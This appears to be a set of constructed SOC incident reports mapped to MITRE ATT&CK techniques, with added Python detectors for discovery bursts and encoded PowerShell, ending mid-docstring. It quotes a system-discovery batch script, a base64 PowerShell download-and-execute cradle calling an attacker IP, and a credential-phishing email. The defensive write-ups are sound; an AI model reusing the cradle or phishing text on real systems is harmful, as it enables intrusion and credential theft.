Detection: Multiple system information gathering commands executed from single process
Host: SALES-WS-045 (Sales Department)
User: mwilson@company.com (Mike Wilson, Sales Rep)
Time: 09:25 EST
Process Tree:
```text
explorer.exe (PID: 2341)
  cmd.exe (PID: 4789)
    systeminfo.exe (PID: 4792) – Command: systeminfo
    hostname.exe (PID: 4795) – Command: hostname
    whoami.exe (PID: 4798) – Command: whoami /all
    ipconfig.exe (PID: 4801) – Command: ipconfig /all
    netstat.exe (PID: 4804) – Command: netstat -ano
    tasklist.exe (PID: 4807) – Command: tasklist /v
    wmic.exe (PID: 4810) – Command: wmic os get Caption,Version,CSName
    wmic.exe (PID: 4813) – Command: wmic cpu get Name,NumberOfCores
    wmic.exe (PID: 4816) – Command: wmic memorychip get Capacity
    wmic.exe (PID: 4819) – Command: wmic logicaldisk get DeviceID,Size,FreeSpace
    reg.exe (PID: 4822) – Command: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
    powershell.exe (PID: 4825) – Command: Get-WmiObject Win32_Product | Select Name,Version
```
Output Files Created:
C:\Users\mwilson\AppData\Local\Temp\sysinfo.txt (27 KB)
C:\Users\mwilson\AppData\Local\Temp\processes.txt (12 KB)
C:\Users\mwilson\AppData\Local\Temp\network.txt (8 KB)
Detection Logic:
14 system discovery commands executed in 2 minutes (highly unusual)
Commands output saved to files (data aggregation)
User mwilson has no history of running these commands
Pattern matches adversary initial reconnaissance
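The CrowdStrike detection logic above, reconstructed as an added example (not Falcon's own rule): Python that groups process-creation events (Event 4688 / Sysmon Event 1) by parent PID and flags a parent whose children include five or more distinct discovery tools inside two minutes, which separates a scripted collection burst from a technician typing ipconfig by hand. The tool list, thresholds and sample events are assumptions; the PIDs and commands of the first chain are taken from the process tree above.

```python
"""Discovery-command burst detection by process lineage (T1082), added example."""
from collections import defaultdict
from datetime import datetime, timedelta

DISCOVERY_IMAGES = {"systeminfo.exe", "hostname.exe", "whoami.exe", "ipconfig.exe",
                    "netstat.exe", "tasklist.exe", "wmic.exe", "reg.exe", "net.exe",
                    "nltest.exe", "quser.exe", "arp.exe", "route.exe", "qwinsta.exe"}
PS_DISCOVERY = ("get-wmiobject", "get-ciminstance", "get-computerinfo", "get-netipconfiguration")
WINDOW = timedelta(minutes=2)
DISTINCT_THRESHOLD = 5      # distinct discovery tools from one parent inside the window


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_discovery(ev):
    """Classify one process-creation event. PowerShell counts only when the command
    line carries a discovery cmdlet; bare powershell.exe launches are too common."""
    name = image_name(ev["image"])
    if name in DISCOVERY_IMAGES:
        return True
    if name in ("powershell.exe", "pwsh.exe"):
        return any(c in ev["cmdline"].lower() for c in PS_DISCOVERY)
    return False


def build_sample_events():
    """Constructed records. The first chain mirrors the alert's process tree (cmd.exe
    running discovery.bat); the second is a helpdesk technician running two commands."""
    t0 = datetime(2024, 2, 25, 9, 22)
    sysdir = "C:\\Windows\\System32\\"
    evs = [
        {"ts": t0, "pid": 2341, "ppid": 1000, "user": "mwilson",
         "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
        {"ts": t0, "pid": 4789, "ppid": 2341, "user": "mwilson", "image": sysdir + "cmd.exe",
         "cmdline": 'cmd.exe /c "C:\\Users\\mwilson\\Downloads\\discovery.bat"'},
    ]
    children = [
        ("systeminfo.exe", "systeminfo"), ("hostname.exe", "hostname"),
        ("whoami.exe", "whoami /all"), ("ipconfig.exe", "ipconfig /all"),
        ("netstat.exe", "netstat -ano"), ("tasklist.exe", "tasklist /v"),
        ("wbem\\wmic.exe", "wmic os get Caption,Version,CSName"),
        ("wbem\\wmic.exe", "wmic cpu get Name,NumberOfCores"),
        ("wbem\\wmic.exe", "wmic memorychip get Capacity"),
        ("wbem\\wmic.exe", "wmic logicaldisk get DeviceID,Size,FreeSpace"),
        ("reg.exe", "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall"),
        ("WindowsPowerShell\\v1.0\\powershell.exe",
         'powershell -Command "Get-WmiObject Win32_Product | Select Name,Version"'),
    ]
    for k, (image, cmd) in enumerate(children):
        evs.append({"ts": t0 + timedelta(seconds=8 * k), "pid": 4792 + 3 * k, "ppid": 4789,
                    "user": "mwilson", "image": sysdir + image, "cmdline": cmd})
    for k, (image, cmd) in enumerate([("ipconfig.exe", "ipconfig /all"), ("hostname.exe", "hostname")]):
        evs.append({"ts": t0 + timedelta(minutes=30, seconds=20 * k), "pid": 6100 + k,
                    "ppid": 6001, "user": "helpdesk1", "image": sysdir + image, "cmdline": cmd})
    return evs


def detect_discovery_bursts(events):
    """Group process-creation events by parent PID and flag a parent whose children
    include at least DISTINCT_THRESHOLD different discovery tools inside one
    2-minute window. Returns {parent_pid: finding} for the densest such window."""
    by_pid = {ev["pid"]: ev for ev in events}
    children = defaultdict(list)
    for ev in events:
        if is_discovery(ev):
            children[ev["ppid"]].append(ev)
    findings = {}
    for ppid, evs in children.items():
        evs.sort(key=lambda e: e["ts"])
        best, start = None, 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > WINDOW:
                start += 1
            window = evs[start:end + 1]
            tools = sorted({image_name(e["image"]) for e in window})
            if len(tools) >= DISTINCT_THRESHOLD and (best is None or len(window) > best["commands"]):
                parent = by_pid.get(ppid)
                best = {
                    "parent_cmdline": parent["cmdline"] if parent else "<parent not in log>",
                    "user": window[0]["user"],
                    "distinct_tools": tools,
                    "commands": len(window),
                    "span_seconds": int((window[-1]["ts"] - window[0]["ts"]).total_seconds()),
                }
        if best:
            findings[ppid] = best
    return findings


if __name__ == "__main__":
    for ppid, finding in detect_discovery_bursts(build_sample_events()).items():
        print(ppid, finding)
```

The parent's command line is carried into the finding because it is what the analyst needs first: here it points straight at the script in the Downloads folder.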
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed system discovery commands |
| 2. Process Investigation | Identify source of commands | CrowdStrike | Commands run from suspicious script in Downloads |
| 3. Script Analysis | Analyze discovery.bat | Manual review | Script collects system info for “inventory” – unauthorized |
| 4. User Interview | Contact mwilson | Teams, Phone | User downloaded “system info tool” from internet |
| 5. Immediate Action | Delete script and output files | CrowdStrike Live Response | Files removed |
| 6. User Remediation | User counseling | Manager, HR | Policy violation documented |
Jira Incident Report
Ticket: SOC-2024-126
Summary: T1082 – System Information Discovery Script Executed
Status: RESOLVED
Resolution: POLICY VIOLATION – Unauthorized Reconnaissance
Priority: P3 – LOW
Labels: T1082, system-discovery, reconnaissance, crowdstrike, policy-violation
Components: Endpoint-Security, User-Behavior
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “System Information Discovery – Reconnaissance Commands”.
Host: SALES-WS-045 (Sales Department, user mwilson).
Time: 2024-02-25 09:30 EST.
Technique: MITRE ATT&CK T1082 – System Information Discovery.
2. Technical Analysis:
Reconnaissance Details:
Script: C:\Users\mwilson\Downloads\discovery.bat
Contents:
```batch
@echo off
echo === System Information === > %temp%\sysinfo.txt
systeminfo >> %temp%\sysinfo.txt
hostname >> %temp%\sysinfo.txt
whoami /all >> %temp%\sysinfo.txt
ipconfig /all >> %temp%\sysinfo.txt
netstat -ano >> %temp%\network.txt
tasklist /v >> %temp%\processes.txt
wmic os get Caption,Version,CSName >> %temp%\sysinfo.txt
wmic cpu get Name,NumberOfCores >> %temp%\sysinfo.txt
wmic memorychip get Capacity >> %temp%\sysinfo.txt
wmic logicaldisk get DeviceID,Size,FreeSpace >> %temp%\sysinfo.txt
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall >> %temp%\software.txt
powershell -Command "Get-WmiObject Win32_Product | Select Name,Version" >> %temp%\software.txt
```
Purpose: Collect comprehensive system information (OS, hardware, software, network, processes)
Information Collected:
OS version, install date, last boot
Hostname, domain membership
User details (whoami /all)
IP configuration, DNS servers, MAC addresses
Active network connections (netstat)
Running processes (tasklist)
CPU, RAM, disk details
Installed software list (including versions)
User Intent:
User claimed “needed system specs for software purchase”
No malicious intent identified
Unauthorized use of reconnaissance script
Data not exfiltrated
Policy Violation:
Running unauthorized scripts
Collecting system information without approval
Potential misuse of discovery tools
3. Investigation Findings:
Timeline:
09:20 – Script downloaded
09:22-09:24 – Script executed
09:25 – CrowdStrike alerts
09:27 – SOC investigates
09:30 – Script and output files deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\mwilson\Downloads\discovery.bat
– C:\Users\mwilson\AppData\Local\Temp\sysinfo.txt
– C:\Users\mwilson\AppData\Local\Temp\network.txt
– C:\Users\mwilson\AppData\Local\Temp\processes.txt
– C:\Users\mwilson\AppData\Local\Temp\software.txt
Commands:
– systeminfo, hostname, whoami, ipconfig, netstat, tasklist, wmic, reg, powershell
4. Containment Actions:
Immediate Actions:
Deleted discovery.bat and all output files.
No isolation needed (non-malicious).
User counseled on policy.
Data Protection:
Information collected remained local; not exfiltrated.
No sensitive data accessed beyond what user already had.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed unauthorized reconnaissance script.
Contributing Factors:
No application control blocking scripts.
User unaware of policy against system discovery.
6. Business Impact:
Operational Impact: None.
Security Impact: System information collected but not shared.
7. Remediation & Prevention:
Completed Actions:
Script removed.
User educated.
Policy reinforced.
Technical Controls Enhanced:
Created alert for multiple system discovery commands.
Enhanced application control policies.
8. Conclusion:
A sales user executed a script that collected extensive system information. CrowdStrike detected the reconnaissance pattern and enabled removal of the script. No data was exfiltrated, and the activity was a policy violation, not malicious.
Closure Rationale: Script removed; user educated; policy violation documented.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-25 10:30 EST
87. T1021 – Remote Services (Cisco ISE Detection)
Cisco ISE Alert Details
Alert ID: ISE-REMOTE-SERVICES-1021-7842
Alert Time: 2024-02-25 14:15:33 EST
Severity: HIGH (85/100)
Source: Cisco Identity Services Engine (ISE)
Rule: “Unusual RDP Connection to Critical Server”
MITRE ATT&CK: T1021.001 – Remote Services: Remote Desktop Protocol
Alert Details:
Detection: RDP connection from unusual endpoint to domain controller
Connection Details:
Source: 192.168.45.78 (ENG-WS-045 – Engineering Workstation)
Destination: 192.168.10.10 (DC-01 – Primary Domain Controller)
User: rpatel@company.com (Raj Patel, Engineer)
Time: 14:10-14:15 EST
Protocol: RDP (TCP/3389)
Session Duration: 5 minutes
Contextual Anomalies:
User rpatel never connects to domain controllers (normal access: file servers only)
Source host is engineering workstation (not IT/admin)
Destination is critical infrastructure (DC)
Time of day: 14:10 (unusual for admin tasks)
No change management ticket for this access
Activity During Session (from EDR logs):
14:11 – PowerShell launched (encoded command)
14:12 – Attempted to enumerate AD users
14:13 – Attempted to access LSASS (blocked)
14:14 – Scheduled task created: “SystemCheck”
14:15 – Session terminated (ISE triggered)
Detection Logic:
User-to-server mapping anomaly (engineer to DC)
Behavioral baseline violation
Process activity indicative of post-exploitation
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Cisco ISE alert | ISE Console, AD Logs | Confirmed anomalous RDP connection |
| 2. Process Investigation | Check activity on DC-01 | CrowdStrike Falcon | PowerShell executed, scheduled task created |
| 3. User Interview | Contact rpatel | Teams, Phone | User did NOT initiate RDP session |
| 4. Immediate Action | Isolate ENG-WS-045 | CrowdStrike | Engineering host quarantined |
| 5. Account Remediation | Disable rpatel account | Azure AD, AD | Account disabled |
| 6. Clean DC | Remove scheduled task | PowerShell | Scheduled task “SystemCheck” deleted |
Jira Incident Report
Ticket: SOC-2024-127
Summary: T1021 – Unauthorized RDP to Domain Controller from Compromised Engineering Host
Status: RESOLVED
Resolution: MALICIOUS – Lateral Movement Blocked
Priority: P1 – CRITICAL
Labels: T1021, remote-services, rdp, lateral-movement, cisco-ise, compromised-account
Components: Network-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Cisco Identity Services Engine (ISE).
Alert: “Unusual RDP Connection to Critical Server”.
Source: ENG-WS-045 (Engineering, user rpatel).
Destination: DC-01 (Primary Domain Controller).
Time: 2024-02-25 14:15 EST.
Technique: MITRE ATT&CK T1021.001 – Remote Services: Remote Desktop Protocol.
2. Technical Analysis:
Attack Chain:
13:45 – rpatel credentials compromised via phishing
13:50 – Attacker logs into ENG-WS-045 via RDP (from external IP)
13:55 – Attacker uses compromised credentials to RDP to DC-01
14:10-14:15 – Attacker on DC-01
14:11-14:14 – Malicious activities
14:15 – ISE detects anomaly
Activities on DC-01:
PowerShell Encoded Command:
powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAxADQAMwAuADIAMgAxAFsALgA5ADgALwB1AHAAZABhAHQAZQAnACkA
Decoded: IEX (New-Object Net.WebClient).DownloadString(‘http://185.143.221[.]89/update’)
Scheduled Task Created:
Name: “SystemCheck”
Action: PowerShell to download and execute payload hourly
Status: Created but not triggered yet
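Decoding the encoded command above is the first triage step for an alert like this. As an added example that is not taken from the report, the Python helper below extracts a -EncodedCommand argument from a process command line, decodes its base64/UTF-16LE payload, flags the IEX and download-cradle primitives, and returns any URLs defanged for the ticket; the sample command line is constructed inside the block with a documentation-range address rather than the incident's IP.

```python
"""Triage helper for PowerShell -EncodedCommand launches (T1021 follow-up), added example."""
import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings that show up most often in Event 4688 command lines.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)
RISKY = {   # name -> pattern, matched against the outer command line plus the decoded script
    "Invoke-Expression/IEX": re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE),
    "download cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient",
                                  re.IGNORECASE),
    "nested encoding": re.compile(r"frombase64string", re.IGNORECASE),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
}


def defang(url):
    """Render a URL so it cannot be clicked or auto-fetched from a ticket."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def analyze_cmdline(cmdline):
    """Decode the -EncodedCommand payload (base64 of UTF-16LE text) in a process
    command line and report risky primitives and defanged URLs.
    Returns None when the command line carries no encoded payload."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError) as exc:
        # Truncated log fields and odd byte counts land here; still worth a ticket.
        return {"decoded": None, "error": str(exc), "indicators": [], "urls": []}
    haystack = cmdline + "\n" + decoded
    return {
        "decoded": decoded,
        "error": None,
        "indicators": [name for name, rx in RISKY.items() if rx.search(haystack)],
        "urls": [defang(u) for u in URL.findall(decoded)],
    }


def encode_command(script):
    """Build the base64/UTF-16LE form powershell.exe expects (used only for the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample shaped like the cradle in the report; 203.0.113.10 is a
# documentation-range placeholder, not the incident's address.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/update')"
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -EncodedCommand " + encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(analyze_cmdline(SAMPLE_CMDLINE))
```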
Lateral Movement:
Attacker moved from compromised engineering host to domain controller
Gained foothold on critical infrastructure
Attempted to establish persistence
3. Investigation Findings:
Timeline:
13:45 – Credentials compromised
13:50 – Attacker on ENG-WS-045
14:10 – RDP to DC-01
14:11-14:14 – Malicious actions
14:15 – ISE alert
14:17 – SOC investigates
14:18 – ENG-WS-045 isolated
14:19 – rpatel account disabled
14:20 – Scheduled task removed
14:21 – Attacker RDP session terminated
Indicators of Compromise (IoCs):
Network:
– Attacker external IP: 185.143.221[.]89
– Internal RDP: 192.168.45.78 -> 192.168.10.10
Account:
– rpatel (compromised)
Scheduled Task:
– DC-01: “SystemCheck” (deleted)
File:
– C:\Windows\Temp\update.ps1 (deleted)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Disabled rpatel account.
Terminated RDP session.
Deleted scheduled task from DC-01.
Removed any downloaded files.
DC-01 Remediation:
Full scan (no other malware).
Verified no persistence mechanisms.
Credential rotation for all domain admins (precaution).
User Remediation:
rpatel password reset.
MFA enforced.
5. Root Cause Analysis:
Primary Cause: User credentials compromised via phishing.
Contributing Factors:
No MFA on account.
RDP allowed from any internal host to DC.
Over-privileged user (engineer should not have RDP to DC).
6. Business Impact:
Operational Impact: DC-01 offline for 30 minutes for cleanup.
Security Impact: Attacker gained brief access to domain controller; persistence prevented.
7. Remediation & Prevention:
Completed Actions:
Lateral movement blocked.
DC cleaned.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Restricted RDP to DC to specific admin jump hosts (PAW).
Implemented network segmentation.
Enhanced monitoring for RDP to critical servers.
8. Conclusion:
An attacker used compromised credentials to RDP from an engineering workstation to a domain controller, performing malicious actions and establishing persistence. Cisco ISE detected the anomalous connection, enabling rapid containment. The DC was cleaned before any significant damage.
Closure Rationale: Lateral movement blocked; DC cleaned; account secured.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-25 15:30 EST
88. T1012 – Query Registry (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-REGQUERY-1012-7842
Alert Time: 2024-02-25 11:30:22 EST
Severity: MEDIUM (68/100)
Source: Sysmon (Event ID 1 – Process Creation, Event ID 12-13 – Registry Events)
Rule: “Suspicious Registry Queries – Potential Reconnaissance”
MITRE ATT&CK: T1012 – Query Registry
Alert Details:
Detection: Multiple registry queries of sensitive keys from suspicious process
Host: FIN-WS-078 (Finance Workstation)
User: bturner (Brian Turner, Accountant)
Time: 11:25 EST
Registry Queries:
11:25:10 – Query: HKLM\SAM\SAM (attempted) – ACCESS DENIED
11:25:12 – Query: HKLM\SECURITY\SECURITY (attempted) – ACCESS DENIED
11:25:15 – Query: HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters (success)
11:25:18 – Query: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (success)
11:25:21 – Query: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce (success)
11:25:24 – Query: HKCU\Software\Microsoft\Windows\CurrentVersion\Run (success)
11:25:27 – Query: HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Shares (success)
11:25:30 – Query: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon (success)
11:25:33 – Query: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall (success)
11:25:36 – Query: HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (success)
Process Details:
Process: C:\Users\bturner\AppData\Local\Temp\reg_scanner.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: explorer.exe
Detection Logic:
Process accessing multiple sensitive registry keys
Attempt to access SAM/SECURITY (privilege escalation indicators)
Queries of autostart locations (persistence discovery)
Process from Temp folder (suspicious)
Pattern matches malware reconnaissance
SOC Investigation Process

| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Sysmon events | Splunk, Sysmon Logs | Confirmed suspicious registry queries |
| 2. Process Analysis | Analyze reg_scanner.exe | CrowdStrike Sandbox | Malware that enumerates registry for autostart, system info |
| 3. Immediate Action | Terminate process | CrowdStrike | Process killed |
| 4. File Deletion | Delete reg_scanner.exe | CrowdStrike Live Response | File removed |
| 5. User Interview | Contact bturner | Teams, Phone | User downloaded “registry cleaner” tool – unaware |
| 6. Host Scan | Full scan for other malware | CrowdStrike | No additional malware found |
Jira Incident Report
Ticket: SOC-2024-128
Summary: T1012 – Registry Query Reconnaissance by Malicious Tool
Status: RESOLVED
Resolution: MALICIOUS – Tool Removed
Priority: P2 – MEDIUM
Labels: T1012, query-registry, registry-recon, sysmon, malware
Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon (Event ID 1, 12-13).
Alert: “Suspicious Registry Queries – Potential Reconnaissance”.
Host: FIN-WS-078 (Finance Department, user bturner).
Process: C:\Users\bturner\AppData\Local\Temp\reg_scanner.exe.
Time: 2024-02-25 11:30 EST.
Technique: MITRE ATT&CK T1012 – Query Registry.
2. Technical Analysis:
Attack Chain:
11:15 – User clicks pop-up ad for “Registry Cleaner”
11:16 – Downloads reg_scanner.exe from malicious site
11:17 – Executes file
11:18-11:25 – Tool queries multiple registry keys
11:25 – Sysmon detects
11:26 – SOC investigates
Registry Queries Performed:
SAM/SECURITY: Attempted privilege escalation info (failed)
Autostart Locations: Run, RunOnce (persistence discovery)
Network Settings: TCP/IP parameters (network info)
Shares: LanmanServer (share discovery)
Winlogon: Credential management settings
Uninstall: Installed software list
Hardware: CPU info (system discovery)
Malware Analysis:
Name: reg_scanner.exe (Registry Optimizer scam)
SHA256: a1b2c3d4…
Capabilities:
Enumerates registry for system information
Displays fake “issues found” to scare user
Prompts user to pay for “fix”
No actual malware payload (adware/scareware)
User Intent:
User thought tool would speed up computer
Unaware of risks
No data exfiltrated
3. Investigation Findings:
Timeline:
11:15 – User clicks ad
11:16-11:17 – Download and execution
11:18-11:25 – Registry queries
11:25 – Sysmon alert
11:26 – SOC investigates
11:28 – Process terminated
11:29 – File deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\bturner\AppData\Local\Temp\reg_scanner.exe (SHA256: a1b2c3d4…)
Registry:
– Queries of SAM, SECURITY, Run, RunOnce, Uninstall, etc.
Network:
– No C2 (adware only)
4. Containment Actions:
Immediate Actions:
Terminated reg_scanner.exe.
Deleted executable.
Full scan (clean).
No isolation needed (non-persistent).
User Remediation:
User counseled on downloading untrusted software.
Ad-blocker enabled in browser.
5. Root Cause Analysis:
Primary Cause: User clicked on malicious ad and downloaded scareware.
Contributing Factors:
No application control blocking unknown executables.
User unaware of adware risks.
6. Business Impact:
Operational Impact: Finance user offline for 30 minutes.
Data Exposure: None (no exfiltration).
7. Remediation & Prevention:
Completed Actions:
Malware removed.
User educated.
Ad-blocker enabled.
Technical Controls Enhanced:
Created alert for registry queries of sensitive keys.
Enhanced application control policies.
8. Conclusion:
A user downloaded a fake registry cleaner that performed extensive registry reconnaissance, including attempts to access SAM. Sysmon detected the anomalous registry queries, enabling rapid removal. The tool was adware, not a major threat, but highlighted user awareness gaps.
Closure Rationale: Malware removed; user educated; registry monitoring enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-25 12:30 EST
89. T1210 – Exploitation of Remote Services (Palo Alto Detection)
Palo Alto Alert Details
Alert ID: PAN-EXPLOIT-1210-7842
Alert Time: 2024-02-25 16:30:45 EST
Severity: CRITICAL (95/100)
Source: Palo Alto Networks Threat Prevention
Rule: “EternalBlue Exploit Attempt (MS17-010) Detected”
MITRE ATT&CK: T1210 – Exploitation of Remote Services
Alert Details:
Detection: EternalBlue (MS17-010) exploit attempt against internal host
Threat ID: 38852 (EternalBlue SMB Exploit)
Source IP: 192.168.45.78 (ENG-WS-045 – Engineering)
Destination IP: 192.168.10.20 (FILE-SRV-02 – File Server)
Destination Port: 445 (SMB)
Time: 16:25-16:30 EST
Action: BLOCKED (IPS)
Exploit Details:
Vulnerability: CVE-2017-0144 (EternalBlue)
CVSS: 9.3 (Critical)
Affected: SMBv1 protocol
Attempts: 12 in 5 seconds
Payload: Shellcode attempting to execute meterpreter reverse shell
Additional Context:
Source host ENG-WS-045 had been flagged earlier for suspicious activity
Destination FILE-SRV-02 unpatched (MS17-010 patch missing)
Exploit blocked by IPS; no compromise
Threat Intelligence:
EternalBlue used by ransomware (WannaCry, NotPetya)
Indicates attacker attempting lateral movement
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Palo Alto alert | Panorama Logs | Confirmed EternalBlue exploit attempt |
| 2. Source Investigation | Check ENG-WS-045 | CrowdStrike Falcon | Host has Cobalt Strike beacon (compromised) |
| 3. Immediate Action | Isolate source host | CrowdStrike | ENG-WS-045 quarantined |
| 4. Destination Check | Verify FILE-SRV-02 patch status | SCCM, Nessus | FILE-SRV-02 MISSING MS17-010 patch |
| 5. Patch Destination | Apply emergency patch | SCCM | MS17-010 installed on FILE-SRV-02 |
| 6. Threat Hunting | Check for other exploit attempts | Palo Alto, Splunk | No other EternalBlue attempts found |
Jira Incident Report
Ticket: SOC-2024-129
Summary: T1210 – EternalBlue Exploit Attempt from Compromised Engineering Host
Status: RESOLVED
Resolution: MALICIOUS – Exploit Blocked
Priority: P1 – CRITICAL
Labels: T1210, exploitation, remote-services, eternalblue, palo-alto, lateral-movement
Components: Network-Security, Vulnerability-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Palo Alto Networks Threat Prevention.
Alert: “EternalBlue Exploit Attempt (MS17-010) Detected”.
Source: 192.168.45.78 (ENG-WS-045 – Engineering Workstation).
Destination: 192.168.10.20 (FILE-SRV-02 – File Server).
Time: 2024-02-25 16:30 EST.
Technique: MITRE ATT&CK T1210 – Exploitation of Remote Services.
2. Technical Analysis:
Attack Chain:
15:30 – ENG-WS-045 compromised via phishing (Cobalt Strike)
16:00 – Attacker performs internal reconnaissance
16:25 – Attacker launches EternalBlue exploit against file server
16:25-16:30 – 12 exploit attempts
16:30 – Palo Alto IPS blocks and alerts
Exploit Details:
Vulnerability: MS17-010 (EternalBlue)
Target: SMBv1 service on FILE-SRV-02
Payload: Meterpreter reverse shell to attacker C2
Status: Blocked by IPS; no compromise
Source Host Analysis (ENG-WS-045):
Cobalt Strike beacon detected (CrowdStrike alert)
Attacker had full control
Used as pivot for lateral movement
Isolated after detection
Destination Host Status:
FILE-SRV-02 was MISSING MS17-010 patch
Vulnerable to EternalBlue
Exploit would have succeeded if not blocked
3. Investigation Findings:
Timeline:
15:30 – ENG-WS-045 compromised
16:00-16:25 – Reconnaissance
16:25-16:30 – Exploit attempts
16:30 – Palo Alto alert
16:32 – SOC investigates
16:33 – ENG-WS-045 isolated
16:35 – FILE-SRV-02 patched
Indicators of Compromise (IoCs):
Network:
– Source: 192.168.45.78 (compromised)
– Destination: 192.168.10.20
– Exploit signature: EternalBlue (MS17-010)
Host:
– ENG-WS-045: Cobalt Strike beacon (SHA256: b2c3d4e5…)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045 via CrowdStrike.
Blocked any further traffic from source.
Applied MS17-010 patch to FILE-SRV-02 (emergency).
Verified patch installed.
Source Remediation:
Full forensic analysis of ENG-WS-045.
Cobalt Strike beacon removed.
Host reimaged.
Enterprise-Wide Actions:
Scanned all servers for MS17-010 patch status.
Found 3 additional servers missing patch; patched.
5. Root Cause Analysis:
Primary Cause: Compromised engineering workstation used to launch lateral movement.
Contributing Factors:
File server unpatched (MS17-010 missing).
SMBv1 enabled (should be disabled).
No network segmentation limiting SMB traffic.
6. Business Impact:
Operational Impact: File server offline for 30 minutes (patching).
Security Impact: Exploit blocked; no compromise.
7. Remediation & Prevention:
Completed Actions:
Exploit blocked.
Source isolated.
Destination patched.
Enterprise-wide patch scan.
Technical Controls Enhanced:
Disabled SMBv1 enterprise-wide via GPO.
Implemented network segmentation to limit lateral movement.
Enhanced IPS signatures.
Regular vulnerability scanning enforced.
8. Conclusion:
An attacker used a compromised engineering workstation to attempt EternalBlue exploitation against an unpatched file server. Palo Alto IPS blocked the exploit, preventing lateral movement. The source host was isolated, and the destination was patched.
Closure Rationale: Exploit blocked; source isolated; destination patched.
Analyst: [Walter White], SOC Analyst Date: 2024-02-25 17:30 EST
90. T1534 – Internal Spearphishing (Proofpoint Detection)
Proofpoint Alert Details
Alert ID: PROOFPOINT-INTERNAL-PHISH-1534-7842
Alert Time: 2024-02-25 10:30:22 EST
Severity: CRITICAL (98/100)
Source: Proofpoint Email Security
Rule: “Internal Spearphishing – Compromised Account Sending Malicious Emails”
MITRE ATT&CK: T1534 – Internal Spearphishing
Alert Details:
Detection: Compromised internal account sending phishing emails to other employees
Compromised Account: jwilson@company.com (John Wilson, IT Administrator)
Recipients: 47 employees (Finance, HR, Executive)
Time: 10:15-10:30 EST
Email Details:
From: jwilson@company.com (legitimate internal address)
Subject: “Urgent: IT Security Update – Action Required”
Body:
Dear Colleague,
IT Security has detected unusual activity on your account. To prevent lockout, you must verify your credentials immediately.
Click here to verify: https://company-portal-verify[.]net
Failure to verify within 2 hours will result in account suspension.
Thanks,
IT Security Team
Link: https://company-portal-verify[.]net (malicious domain)
Anomaly Detection:
Sender jwilson normally sends 5-10 emails/day (all IT-related)
Today: 47 emails in 15 minutes to non-IT recipients
Email content unusual (threat of account suspension)
Link domain suspicious (not legitimate company portal)
MIME headers show originating IP 185.143.221[.]89 (Bulgaria)
Additional Context:
jwilson’s account had suspicious login earlier (from Bulgaria)
Account likely compromised
Internal phishing used to bypass email filters (trusted sender)
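The indicators listed under Anomaly Detection above (a send-rate burst far above the sender's baseline, recipients outside the sender's department, a non-corporate originating IP, a link domain that is not the company's) can be scored from gateway logs. The script below is an added example, not Proofpoint's detection logic or anything from this report's SOC; the log lines, per-sender baselines, corporate IP ranges and trusted link domains are all constructed, with the attacker IP taken from the report.

```python
"""Internal-spearphishing anomaly detector over constructed mail-gateway logs.

Added example, not Proofpoint's detection logic: it scores a sender on the
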